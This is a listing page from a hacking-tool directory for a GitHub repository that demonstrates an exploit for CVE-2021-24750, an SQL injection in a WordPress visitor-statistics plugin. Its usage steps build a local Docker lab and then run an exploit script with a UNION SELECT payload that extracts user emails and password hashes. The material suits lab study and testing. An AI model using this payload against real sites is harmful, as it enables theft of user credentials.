Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/fimtow/cve-2021-24750
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubfimtow/cve-2021-24750

CVE-2021-24750

Demonstration of the WP Visitor Statistics plugin exploit

View Repository
124 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

How to use

  • Start mysql, wordpress and wordpress-cli using docker-compose
root@kitploit:~
docker-compose -f docker-compose.yaml up -d
  • Install wordpress, activate the plugin and create a user with the role subscriber using wordpress-cli
root@kitploit:~
docker-compose run --rm wp-cli install-wp
  • Start the exploit script with an sql query that gets users emails and passwords
root@kitploit:~
python3 exploit.py -C 'union select 1,1,user_email,user_pass from wp_users -- '
Download Tool